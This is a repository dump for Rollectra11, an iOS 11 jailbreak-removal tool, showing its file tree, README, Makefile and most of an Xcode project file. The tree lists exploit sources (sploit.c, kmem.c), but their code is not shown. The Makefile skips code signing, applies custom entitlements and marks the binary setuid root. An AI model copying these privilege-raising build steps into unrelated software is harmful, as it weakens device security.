├── .gitignore ├── .gitmodules ├── Makefile ├── README.md ├── Rollectra-1.1.ipa ├── Rollectra.xcodeproj ├── project.pbxproj ├── project.xcworkspace │ ├── contents.xcworkspacedata │ └── xcshareddata │ │ └── IDEWorkspaceChecks.plist └── xcuserdata │ └── pwn20wnd.xcuserdatad │ └── xcschemes │ └── xcschememanagement.plist ├── Rollectra ├── AppDelegate.h ├── AppDelegate.m ├── AppIcon20x20.png ├── AppIcon20x20@2x.png ├── AppIcon20x20@3x.png ├── AppIcon29x29.png ├── AppIcon29x29@2x.png ├── AppIcon29x29@3x.png ├── AppIcon40x40.png ├── AppIcon40x40@2x.png ├── AppIcon40x40@3x.png ├── AppIcon60x60@2x.png ├── AppIcon60x60@3x.png ├── AppIcon76x76.png ├── AppIcon76x76@2x.png ├── Assets.xcassets │ ├── AppIcon.appiconset │ │ └── Contents.json │ └── Contents.json ├── Base.lproj │ ├── LaunchScreen.storyboard │ └── Main.storyboard ├── Combined Shape.png ├── Combined Shape@2x.png ├── Combined Shape@3x.png ├── Info.plist ├── QiLin.h ├── README ├── RollectraGradientView.h ├── RollectraGradientView.m ├── SpringBoardServices.framework │ └── SpringBoardServices.tbd ├── ViewController.h ├── ViewController.m ├── common.h ├── iokit.h ├── kmem.c ├── kmem.h ├── main.m ├── offsets.h ├── offsets.m ├── qilin.o ├── sploit.c └── sploit.h ├── com.pwn20wnd.semirestore11_1.1-1_iphoneos-arm.deb ├── com.pwn20wnd.semirestore11_1.2-1_iphoneos-arm.deb ├── entitlements.xml └── layout └── DEBIAN ├── control ├── postinst └── postrm /.gitignore: -------------------------------------------------------------------------------- 1 | # Xcode 2 | # 3 | # gitignore contributors: remember to update Global/Xcode.gitignore, Objective-C.gitignore & Swift.gitignore 4 | 5 | ## Build generated 6 | build/ 7 | DerivedData/ 8 | 9 | ## Various settings 10 | *.pbxuser 11 | !default.pbxuser 12 | *.mode1v3 13 | !default.mode1v3 14 | *.mode2v3 15 | !default.mode2v3 16 | *.perspectivev3 17 | !default.perspectivev3 18 | xcuserdata/ 19 | 20 | ## Other 21 | *.moved-aside 22 | *.xccheckout 23 | *.xcscmblueprint 24 | 25 | ## Obj-C/Swift specific 26 | *.hmap 27 | # *.ipa 28 | *.dSYM.zip 29 | *.dSYM 30 | 31 | # CocoaPods 32 | # 33 | # We recommend against adding the Pods directory to your .gitignore. However 34 | # you should judge for yourself, the pros and cons are mentioned at: 35 | # https://guides.cocoapods.org/using/using-cocoapods.html#should-i-check-the-pods-directory-into-source-control 36 | # 37 | # Pods/ 38 | # 39 | # Add this line if you want to avoid checking in source code from the Xcode workspace 40 | # *.xcworkspace 41 | 42 | # Carthage 43 | # 44 | # Add this line if you want to avoid checking in source code from Carthage dependencies. 45 | # Carthage/Checkouts 46 | 47 | Carthage/Build 48 | 49 | # fastlane 50 | # 51 | # It is recommended to not store the screenshots in the git repo. Instead, use fastlane to re-generate the 52 | # screenshots whenever they are needed. 53 | # For more information about the recommended setup visit: 54 | # https://docs.fastlane.tools/best-practices/source-control/#source-control 55 | 56 | fastlane/report.xml 57 | fastlane/Preview.html 58 | fastlane/screenshots/**/*.png 59 | fastlane/test_output 60 | 61 | # Code Injection 62 | # 63 | # After new code Injection tools there's a generated folder /iOSInjectionProject 64 | # https://github.com/johnno1962/injectionforxcode 65 | 66 | iOSInjectionProject/ 67 | # General 68 | .DS_Store 69 | .AppleDouble 70 | .LSOverride 71 | 72 | # Icon must end with two \r 73 | Icon 74 | 75 | 76 | # Thumbnails 77 | ._* 78 | 79 | # Files that might appear in the root of a volume 80 | .DocumentRevisions-V100 81 | .fseventsd 82 | .Spotlight-V100 83 | .TemporaryItems 84 | .Trashes 85 | .VolumeIcon.icns 86 | .com.apple.timemachine.donotpresent 87 | 88 | # Directories potentially created on remote AFP share 89 | .AppleDB 90 | .AppleDesktop 91 | Network Trash Folder 92 | Temporary Items 93 | .apdisk 94 | 95 | -------------------------------------------------------------------------------- /.gitmodules: -------------------------------------------------------------------------------- 1 | [submodule "theos"] 2 | path = theos 3 | url = https://github.com/theos/theos.git 4 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | THEOS=./theos 2 | DEBUG=0 3 | THEOS_DEVICE_IP=127.0.0.1 4 | THEOS_DEVICE_PORT=2222 5 | 6 | include $(THEOS)/makefiles/common.mk 7 | 8 | stage:: 9 | mkdir $(THEOS_STAGING_DIR)/Applications 10 | xcodebuild -arch arm64 -sdk iphoneos CODE_SIGN_IDENTITY="" CODE_SIGNING_REQUIRED=NO OTHER_CFLAGS="-DWANT_CYDIA" OTHER_CPLUSPLUSFLAGS="-DWANT_CYDIA" PRODUCT_BUNDLE_IDENTIFIER="science.xnu.rollectra" OTHER_LDFLAGS="-framework IOKit" 11 | strip ./build/Release-iphoneos/Rollectra.app/Rollectra 12 | ldid -Sentitlements.xml ./build/Release-iphoneos/Rollectra.app/Rollectra 13 | cp -r ./build/Release-iphoneos/Rollectra.app $(THEOS_STAGING_DIR)/Applications/Rollectra.app 14 | chmod 6755 $(THEOS_STAGING_DIR)/Applications/Rollectra.app/Rollectra 15 | 16 | clean:: 17 | rm -rf ./build 18 | 19 | include $(THEOS_MAKE_PATH)/null.mk 20 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Rollectra11 2 | Using this tool will restore the RootFS to its stock state and reset the user data. 3 | So creating a backup using iTunes before using it is recommended. 4 | The Cydia version supports all devices running iOS 11.0 to 11.4 Beta 3. 5 | The Jailed version supports all devices running iOS 11.3 to 11.4 Beta 3. 6 | ~~The 11.2 to 11.2.6 support will be coming really soon.~~ 7 | The 11.2 to 11.2.6 support has been added to the Cydia version. 8 | ~~The 11.0 to 11.1.2 support will also be added in the near future.~~ 9 | The 11.0 to 11.1.2 support was also added to the Cydia version. 10 | Although there's an option to not perform a full restore and keep the user data, I would really not recommend it, since it will leave a lot of left-overs from your jailbreak. 11 | Follow me at @Pwn20wnd for future updates about this tool or to troubleshoot any unexpected behavior that you may be having with this tool. 12 | -------------------------------------------------------------------------------- /Rollectra-1.1.ipa: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwn20wndstuff/Rollectra11/535b66ef7c1637d5749a894f346e36cc3dd184f9/Rollectra-1.1.ipa -------------------------------------------------------------------------------- /Rollectra.xcodeproj/project.pbxproj: -------------------------------------------------------------------------------- 1 | // !$*UTF8*$! 2 | { 3 | archiveVersion = 1; 4 | classes = { 5 | }; 6 | objectVersion = 50; 7 | objects = { 8 | 9 | /* Begin PBXBuildFile section */ 10 | 21C0FC6C21369EB700849420 /* AppDelegate.m in Sources */ = {isa = PBXBuildFile; fileRef = 21C0FC6B21369EB700849420 /* AppDelegate.m */; }; 11 | 21C0FC7221369EB700849420 /* Main.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = 21C0FC7021369EB700849420 /* Main.storyboard */; }; 12 | 21C0FC7421369EB800849420 /* Assets.xcassets in Resources */ = {isa = PBXBuildFile; fileRef = 21C0FC7321369EB800849420 /* Assets.xcassets */; }; 13 | 21C0FC7721369EB800849420 /* LaunchScreen.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = 21C0FC7521369EB800849420 /* LaunchScreen.storyboard */; }; 14 | 21C0FC7A21369EB800849420 /* main.m in Sources */ = {isa = PBXBuildFile; fileRef = 21C0FC7921369EB800849420 /* main.m */; }; 15 | 21C0FC8721369EE900849420 /* kmem.c in Sources */ = {isa = PBXBuildFile; fileRef = 21C0FC8021369EE900849420 /* kmem.c */; }; 16 | 21C0FC8821369EE900849420 /* README in Resources */ = {isa = PBXBuildFile; fileRef = 21C0FC8421369EE900849420 /* README */; }; 17 | 21C0FC8921369EE900849420 /* sploit.c in Sources */ = {isa = PBXBuildFile; fileRef = 21C0FC8521369EE900849420 /* sploit.c */; }; 18 | 21C0FC8A21369EE900849420 /* offsets.m in Sources */ = {isa = PBXBuildFile; fileRef = 21C0FC8621369EE900849420 /* offsets.m */; }; 19 | 21C0FC912136A46500849420 /* SpringBoardServices.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = 21C0FC902136A46500849420 /* SpringBoardServices.framework */; }; 20 | 21C0FC972136E25D00849420 /* Combined Shape@3x.png in Resources */ = {isa = PBXBuildFile; fileRef = 21C0FC942136E25D00849420 /* Combined Shape@3x.png */; }; 21 | 21C0FC982136E25D00849420 /* Combined Shape.png in Resources */ = {isa = PBXBuildFile; fileRef = 21C0FC952136E25D00849420 /* Combined Shape.png */; }; 22 | 21C0FC992136E25D00849420 /* Combined Shape@2x.png in Resources */ = {isa = PBXBuildFile; fileRef = 21C0FC962136E25D00849420 /* Combined Shape@2x.png */; }; 23 | 21C0FC9C2136E29100849420 /* RollectraGradientView.m in Sources */ = {isa = PBXBuildFile; fileRef = 21C0FC9A2136E29100849420 /* RollectraGradientView.m */; }; 24 | 21C0FC9F2136FC5300849420 /* ViewController.m in Sources */ = {isa = PBXBuildFile; fileRef = 21C0FC6E21369EB700849420 /* ViewController.m */; }; 25 | 21C0FCAD2137117B00849420 /* AppIcon20x20@3x.png in Resources */ = {isa = PBXBuildFile; fileRef = 21C0FCA02137117900849420 /* AppIcon20x20@3x.png */; }; 26 | 21C0FCAE2137117B00849420 /* AppIcon60x60@3x.png in Resources */ = {isa = PBXBuildFile; fileRef = 21C0FCA12137117900849420 /* AppIcon60x60@3x.png */; }; 27 | 21C0FCAF2137117B00849420 /* AppIcon76x76.png in Resources */ = {isa = PBXBuildFile; fileRef = 21C0FCA22137117A00849420 /* AppIcon76x76.png */; }; 28 | 21C0FCB02137117B00849420 /* AppIcon76x76@2x.png in Resources */ = {isa = PBXBuildFile; fileRef = 21C0FCA32137117A00849420 /* AppIcon76x76@2x.png */; }; 29 | 21C0FCB12137117B00849420 /* AppIcon60x60@2x.png in Resources */ = {isa = PBXBuildFile; fileRef = 21C0FCA42137117A00849420 /* AppIcon60x60@2x.png */; }; 30 | 21C0FCB22137117B00849420 /* AppIcon40x40@3x.png in Resources */ = {isa = PBXBuildFile; fileRef = 21C0FCA52137117A00849420 /* AppIcon40x40@3x.png */; }; 31 | 21C0FCB32137117B00849420 /* AppIcon29x29.png in Resources */ = {isa = PBXBuildFile; fileRef = 21C0FCA62137117A00849420 /* AppIcon29x29.png */; }; 32 | 21C0FCB42137117B00849420 /* AppIcon29x29@2x.png in Resources */ = {isa = PBXBuildFile; fileRef = 21C0FCA72137117A00849420 /* AppIcon29x29@2x.png */; }; 33 | 21C0FCB52137117B00849420 /* AppIcon29x29@3x.png in Resources */ = {isa = PBXBuildFile; fileRef = 21C0FCA82137117A00849420 /* AppIcon29x29@3x.png */; }; 34 | 21C0FCB62137117B00849420 /* AppIcon40x40.png in Resources */ = {isa = PBXBuildFile; fileRef = 21C0FCA92137117B00849420 /* AppIcon40x40.png */; }; 35 | 21C0FCB72137117B00849420 /* AppIcon40x40@2x.png in Resources */ = {isa = PBXBuildFile; fileRef = 21C0FCAA2137117B00849420 /* AppIcon40x40@2x.png */; }; 36 | 21C0FCB82137117B00849420 /* AppIcon20x20@2x.png in Resources */ = {isa = PBXBuildFile; fileRef = 21C0FCAB2137117B00849420 /* AppIcon20x20@2x.png */; }; 37 | 21C0FCB92137117B00849420 /* AppIcon20x20.png in Resources */ = {isa = PBXBuildFile; fileRef = 21C0FCAC2137117B00849420 /* AppIcon20x20.png */; }; 38 | /* End PBXBuildFile section */ 39 | 40 | /* Begin PBXFileReference section */ 41 | 21C0FC6721369EB700849420 /* Rollectra.app */ = {isa = PBXFileReference; explicitFileType = wrapper.application; includeInIndex = 0; path = Rollectra.app; sourceTree = BUILT_PRODUCTS_DIR; }; 42 | 21C0FC6A21369EB700849420 /* AppDelegate.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = AppDelegate.h; sourceTree = ""; }; 43 | 21C0FC6B21369EB700849420 /* AppDelegate.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = AppDelegate.m; sourceTree = ""; }; 44 | 21C0FC6D21369EB700849420 /* ViewController.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = ViewController.h; sourceTree = ""; }; 45 | 21C0FC6E21369EB700849420 /* ViewController.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = ViewController.m; sourceTree = ""; }; 46 | 21C0FC7121369EB700849420 /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/Main.storyboard; sourceTree = ""; }; 47 | 21C0FC7321369EB800849420 /* Assets.xcassets */ = {isa = PBXFileReference; lastKnownFileType = folder.assetcatalog; path = Assets.xcassets; sourceTree = ""; }; 48 | 21C0FC7621369EB800849420 /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/LaunchScreen.storyboard; sourceTree = ""; }; 49 | 21C0FC7821369EB800849420 /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = ""; }; 50 | 21C0FC7921369EB800849420 /* main.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = main.m; sourceTree = ""; }; 51 | 21C0FC8021369EE900849420 /* kmem.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = kmem.c; sourceTree = ""; }; 52 | 21C0FC8121369EE900849420 /* sploit.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = sploit.h; sourceTree = ""; }; 53 | 21C0FC8221369EE900849420 /* offsets.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = offsets.h; sourceTree = ""; }; 54 | 21C0FC8321369EE900849420 /* kmem.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = kmem.h; sourceTree = ""; }; 55 | 21C0FC8421369EE900849420 /* README */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = text; path = README; sourceTree = ""; }; 56 | 21C0FC8521369EE900849420 /* sploit.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = sploit.c; sourceTree = ""; }; 57 | 21C0FC8621369EE900849420 /* offsets.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = offsets.m; sourceTree = ""; }; 58 | 21C0FC8B21369FC500849420 /* common.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = common.h; sourceTree = ""; }; 59 | 21C0FC8C2136A0D100849420 /* qilin.o */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.objfile"; path = qilin.o; sourceTree = ""; }; 60 | 21C0FC8D2136A0D100849420 /* QiLin.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = QiLin.h; sourceTree = ""; }; 61 | 21C0FC8F2136A2C500849420 /* iokit.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = iokit.h; sourceTree = ""; }; 62 | 21C0FC902136A46500849420 /* SpringBoardServices.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; path = SpringBoardServices.framework; sourceTree = ""; }; 63 | 21C0FC942136E25D00849420 /* Combined Shape@3x.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; path = "Combined Shape@3x.png"; sourceTree = ""; }; 64 | 21C0FC952136E25D00849420 /* Combined Shape.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; path = "Combined Shape.png"; sourceTree = ""; }; 65 | 21C0FC962136E25D00849420 /* Combined Shape@2x.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; path = "Combined Shape@2x.png"; sourceTree = ""; }; 66 | 21C0FC9A2136E29100849420 /* RollectraGradientView.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = RollectraGradientView.m; sourceTree = ""; }; 67 | 21C0FC9B2136E29100849420 /* RollectraGradientView.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = RollectraGradientView.h; sourceTree = ""; }; 68 | 21C0FCA02137117900849420 /* AppIcon20x20@3x.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; path = "AppIcon20x20@3x.png"; sourceTree = ""; }; 69 | 21C0FCA12137117900849420 /* AppIcon60x60@3x.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; path = "AppIcon60x60@3x.png"; sourceTree = ""; }; 70 | 21C0FCA22137117A00849420 /* AppIcon76x76.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; path = AppIcon76x76.png; sourceTree = ""; }; 71 | 21C0FCA32137117A00849420 /* AppIcon76x76@2x.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; path = "AppIcon76x76@2x.png"; sourceTree = ""; }; 72 | 21C0FCA42137117A00849420 /* AppIcon60x60@2x.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; path = "AppIcon60x60@2x.png"; sourceTree = ""; }; 73 | 21C0FCA52137117A00849420 /* AppIcon40x40@3x.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; path = "AppIcon40x40@3x.png"; sourceTree = ""; }; 74 | 21C0FCA62137117A00849420 /* AppIcon29x29.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; path = AppIcon29x29.png; sourceTree = ""; }; 75 | 21C0FCA72137117A00849420 /* AppIcon29x29@2x.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; path = "AppIcon29x29@2x.png"; sourceTree = ""; }; 76 | 21C0FCA82137117A00849420 /* AppIcon29x29@3x.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; path = "AppIcon29x29@3x.png"; sourceTree = ""; }; 77 | 21C0FCA92137117B00849420 /* AppIcon40x40.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; path = AppIcon40x40.png; sourceTree = ""; }; 78 | 21C0FCAA2137117B00849420 /* AppIcon40x40@2x.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; path = "AppIcon40x40@2x.png"; sourceTree = ""; }; 79 | 21C0FCAB2137117B00849420 /* AppIcon20x20@2x.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; path = "AppIcon20x20@2x.png"; sourceTree = ""; }; 80 | 21C0FCAC2137117B00849420 /* AppIcon20x20.png */ = {isa = PBXFileReference; lastKnownFileType = image.png; path = AppIcon20x20.png; sourceTree = ""; }; 81 | /* End PBXFileReference section */ 82 | 83 | /* Begin PBXFrameworksBuildPhase section */ 84 | 21C0FC6421369EB700849420 /* Frameworks */ = { 85 | isa = PBXFrameworksBuildPhase; 86 | buildActionMask = 2147483647; 87 | files = ( 88 | 21C0FC912136A46500849420 /* SpringBoardServices.framework in Frameworks */, 89 | ); 90 | runOnlyForDeploymentPostprocessing = 0; 91 | }; 92 | /* End PBXFrameworksBuildPhase section */ 93 | 94 | /* Begin PBXGroup section */ 95 | 21C0FC5E21369EB700849420 = { 96 | isa = PBXGroup; 97 | children = ( 98 | 21C0FC6921369EB700849420 /* Rollectra */, 99 | 21C0FC6821369EB700849420 /* Products */, 100 | ); 101 | sourceTree = ""; 102 | }; 103 | 21C0FC6821369EB700849420 /* Products */ = { 104 | isa = PBXGroup; 105 | children = ( 106 | 21C0FC6721369EB700849420 /* Rollectra.app */, 107 | ); 108 | name = Products; 109 | sourceTree = ""; 110 | }; 111 | 21C0FC6921369EB700849420 /* Rollectra */ = { 112 | isa = PBXGroup; 113 | children = ( 114 | 21C0FCAC2137117B00849420 /* AppIcon20x20.png */, 115 | 21C0FCAB2137117B00849420 /* AppIcon20x20@2x.png */, 116 | 21C0FCA02137117900849420 /* AppIcon20x20@3x.png */, 117 | 21C0FCA62137117A00849420 /* AppIcon29x29.png */, 118 | 21C0FCA72137117A00849420 /* AppIcon29x29@2x.png */, 119 | 21C0FCA82137117A00849420 /* AppIcon29x29@3x.png */, 120 | 21C0FCA92137117B00849420 /* AppIcon40x40.png */, 121 | 21C0FCAA2137117B00849420 /* AppIcon40x40@2x.png */, 122 | 21C0FCA52137117A00849420 /* AppIcon40x40@3x.png */, 123 | 21C0FCA42137117A00849420 /* AppIcon60x60@2x.png */, 124 | 21C0FCA12137117900849420 /* AppIcon60x60@3x.png */, 125 | 21C0FCA22137117A00849420 /* AppIcon76x76.png */, 126 | 21C0FCA32137117A00849420 /* AppIcon76x76@2x.png */, 127 | 21C0FC9B2136E29100849420 /* RollectraGradientView.h */, 128 | 21C0FC9A2136E29100849420 /* RollectraGradientView.m */, 129 | 21C0FC952136E25D00849420 /* Combined Shape.png */, 130 | 21C0FC962136E25D00849420 /* Combined Shape@2x.png */, 131 | 21C0FC942136E25D00849420 /* Combined Shape@3x.png */, 132 | 21C0FC902136A46500849420 /* SpringBoardServices.framework */, 133 | 21C0FC8F2136A2C500849420 /* iokit.h */, 134 | 21C0FC8D2136A0D100849420 /* QiLin.h */, 135 | 21C0FC8C2136A0D100849420 /* qilin.o */, 136 | 21C0FC8B21369FC500849420 /* common.h */, 137 | 21C0FC8021369EE900849420 /* kmem.c */, 138 | 21C0FC8321369EE900849420 /* kmem.h */, 139 | 21C0FC8221369EE900849420 /* offsets.h */, 140 | 21C0FC8621369EE900849420 /* offsets.m */, 141 | 21C0FC8421369EE900849420 /* README */, 142 | 21C0FC8521369EE900849420 /* sploit.c */, 143 | 21C0FC8121369EE900849420 /* sploit.h */, 144 | 21C0FC6A21369EB700849420 /* AppDelegate.h */, 145 | 21C0FC6B21369EB700849420 /* AppDelegate.m */, 146 | 21C0FC6D21369EB700849420 /* ViewController.h */, 147 | 21C0FC6E21369EB700849420 /* ViewController.m */, 148 | 21C0FC7021369EB700849420 /* Main.storyboard */, 149 | 21C0FC7321369EB800849420 /* Assets.xcassets */, 150 | 21C0FC7521369EB800849420 /* LaunchScreen.storyboard */, 151 | 21C0FC7821369EB800849420 /* Info.plist */, 152 | 21C0FC7921369EB800849420 /* main.m */, 153 | ); 154 | path = Rollectra; 155 | sourceTree = ""; 156 | }; 157 | /* End PBXGroup section */ 158 | 159 | /* Begin PBXNativeTarget section */ 160 | 21C0FC6621369EB700849420 /* Rollectra */ = { 161 | isa = PBXNativeTarget; 162 | buildConfigurationList = 21C0FC7D21369EB800849420 /* Build configuration list for PBXNativeTarget "Rollectra" */; 163 | buildPhases = ( 164 | 21C0FC6321369EB700849420 /* Sources */, 165 | 21C0FC6421369EB700849420 /* Frameworks */, 166 | 21C0FC6521369EB700849420 /* Resources */, 167 | ); 168 | buildRules = ( 169 | ); 170 | dependencies = ( 171 | ); 172 | name = Rollectra; 173 | productName = Rollectra; 174 | productReference = 21C0FC6721369EB700849420 /* Rollectra.app */; 175 | productType = "com.apple.product-type.application"; 176 | }; 177 | /* End PBXNativeTarget section */ 178 | 179 | /* Begin PBXProject section */ 180 | 21C0FC5F21369EB700849420 /* Project object */ = { 181 | isa = PBXProject; 182 | attributes = { 183 | LastUpgradeCheck = 0940; 184 | ORGANIZATIONNAME = Pwn20wnd; 185 | TargetAttributes = { 186 | 21C0FC6621369EB700849420 = { 187 | CreatedOnToolsVersion = 9.4.1; 188 | }; 189 | }; 190 | }; 191 | buildConfigurationList = 21C0FC6221369EB700849420 /* Build configuration list for PBXProject "Rollectra" */; 192 | compatibilityVersion = "Xcode 9.3"; 193 | developmentRegion = en; 194 | hasScannedForEncodings = 0; 195 | knownRegions = ( 196 | en, 197 | Base, 198 | ); 199 | mainGroup = 21C0FC5E21369EB700849420; 200 | productRefGroup = 21C0FC6821369EB700849420 /* Products */; 201 | projectDirPath = ""; 202 | projectRoot = ""; 203 | targets = ( 204 | 21C0FC6621369EB700849420 /* Rollectra */, 205 | ); 206 | }; 207 | /* End PBXProject section */ 208 | 209 | /* Begin PBXResourcesBuildPhase section */ 210 | 21C0FC6521369EB700849420 /* Resources */ = { 211 | isa = PBXResourcesBuildPhase; 212 | buildActionMask = 2147483647; 213 | files = ( 214 | 21C0FCB72137117B00849420 /* AppIcon40x40@2x.png in Resources */, 215 | 21C0FC8821369EE900849420 /* README in Resources */, 216 | 21C0FCB42137117B00849420 /* AppIcon29x29@2x.png in Resources */, 217 | 21C0FC7721369EB800849420 /* LaunchScreen.storyboard in Resources */, 218 | 21C0FC982136E25D00849420 /* Combined Shape.png in Resources */, 219 | 21C0FCB62137117B00849420 /* AppIcon40x40.png in Resources */, 220 | 21C0FC992136E25D00849420 /* Combined Shape@2x.png in Resources */, 221 | 21C0FC7421369EB800849420 /* Assets.xcassets in Resources */, 222 | 21C0FC7221369EB700849420 /* Main.storyboard in Resources */, 223 | 21C0FCB92137117B00849420 /* AppIcon20x20.png in Resources */, 224 | 21C0FC972136E25D00849420 /* Combined Shape@3x.png in Resources */, 225 | 21C0FCB02137117B00849420 /* AppIcon76x76@2x.png in Resources */, 226 | 21C0FCB52137117B00849420 /* AppIcon29x29@3x.png in Resources */, 227 | 21C0FCB82137117B00849420 /* AppIcon20x20@2x.png in Resources */, 228 | 21C0FCAE2137117B00849420 /* AppIcon60x60@3x.png in Resources */, 229 | 21C0FCAD2137117B00849420 /* AppIcon20x20@3x.png in Resources */, 230 | 21C0FCB12137117B00849420 /* AppIcon60x60@2x.png in Resources */, 231 | 21C0FCB32137117B00849420 /* AppIcon29x29.png in Resources */, 232 | 21C0FCAF2137117B00849420 /* AppIcon76x76.png in Resources */, 233 | 21C0FCB22137117B00849420 /* AppIcon40x40@3x.png in Resources */, 234 | ); 235 | runOnlyForDeploymentPostprocessing = 0; 236 | }; 237 | /* End PBXResourcesBuildPhase section */ 238 | 239 | /* Begin PBXSourcesBuildPhase section */ 240 | 21C0FC6321369EB700849420 /* Sources */ = { 241 | isa = PBXSourcesBuildPhase; 242 | buildActionMask = 2147483647; 243 | files = ( 244 | 21C0FC9F2136FC5300849420 /* ViewController.m in Sources */, 245 | 21C0FC9C2136E29100849420 /* RollectraGradientView.m in Sources */, 246 | 21C0FC8721369EE900849420 /* kmem.c in Sources */, 247 | 21C0FC7A21369EB800849420 /* main.m in Sources */, 248 | 21C0FC8921369EE900849420 /* sploit.c in Sources */, 249 | 21C0FC8A21369EE900849420 /* offsets.m in Sources */, 250 | 21C0FC6C21369EB700849420 /* AppDelegate.m in Sources */, 251 | ); 252 | runOnlyForDeploymentPostprocessing = 0; 253 | }; 254 | /* End PBXSourcesBuildPhase section */ 255 | 256 | /* Begin PBXVariantGroup section */ 257 | 21C0FC7021369EB700849420 /* Main.storyboard */ = { 258 | isa = PBXVariantGroup; 259 | children = ( 260 | 21C0FC7121369EB700849420 /* Base */, 261 | ); 262 | name = Main.storyboard; 263 | sourceTree = ""; 264 | }; 265 | 21C0FC7521369EB800849420 /* LaunchScreen.storyboard */ = { 266 | isa = PBXVariantGroup; 267 | children = ( 268 | 21C0FC7621369EB800849420 /* Base */, 269 | ); 270 | name = LaunchScreen.storyboard; 271 | sourceTree = ""; 272 | }; 273 | /* End PBXVariantGroup section */ 274 | 275 | /* Begin XCBuildConfiguration section */ 276 | 21C0FC7B21369EB800849420 /* Debug */ = { 277 | isa = XCBuildConfiguration; 278 | buildSettings = { 279 | ALWAYS_SEARCH_USER_PATHS = NO; 280 | CLANG_ANALYZER_NONNULL = YES; 281 | CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE; 282 | CLANG_CXX_LANGUAGE_STANDARD = "gnu++14"; 283 | CLANG_CXX_LIBRARY = "libc++"; 284 | CLANG_ENABLE_MODULES = YES; 285 | CLANG_ENABLE_OBJC_ARC = YES; 286 | CLANG_ENABLE_OBJC_WEAK = YES; 287 | CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES; 288 | CLANG_WARN_BOOL_CONVERSION = YES; 289 | CLANG_WARN_COMMA = YES; 290 | CLANG_WARN_CONSTANT_CONVERSION = YES; 291 | CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES; 292 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 293 | CLANG_WARN_DOCUMENTATION_COMMENTS = YES; 294 | CLANG_WARN_EMPTY_BODY = YES; 295 | CLANG_WARN_ENUM_CONVERSION = YES; 296 | CLANG_WARN_INFINITE_RECURSION = YES; 297 | CLANG_WARN_INT_CONVERSION = YES; 298 | CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES; 299 | CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES; 300 | CLANG_WARN_OBJC_LITERAL_CONVERSION = YES; 301 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 302 | CLANG_WARN_RANGE_LOOP_ANALYSIS = YES; 303 | CLANG_WARN_STRICT_PROTOTYPES = YES; 304 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 305 | CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE; 306 | CLANG_WARN_UNREACHABLE_CODE = YES; 307 | CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 308 | CODE_SIGN_IDENTITY = "iPhone Developer"; 309 | COPY_PHASE_STRIP = NO; 310 | DEBUG_INFORMATION_FORMAT = dwarf; 311 | ENABLE_STRICT_OBJC_MSGSEND = YES; 312 | ENABLE_TESTABILITY = YES; 313 | GCC_C_LANGUAGE_STANDARD = gnu11; 314 | GCC_DYNAMIC_NO_PIC = NO; 315 | GCC_NO_COMMON_BLOCKS = YES; 316 | GCC_OPTIMIZATION_LEVEL = 0; 317 | GCC_PREPROCESSOR_DEFINITIONS = ( 318 | "DEBUG=1", 319 | "$(inherited)", 320 | ); 321 | GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 322 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 323 | GCC_WARN_UNDECLARED_SELECTOR = YES; 324 | GCC_WARN_UNINITIALIZED_AUTOS = 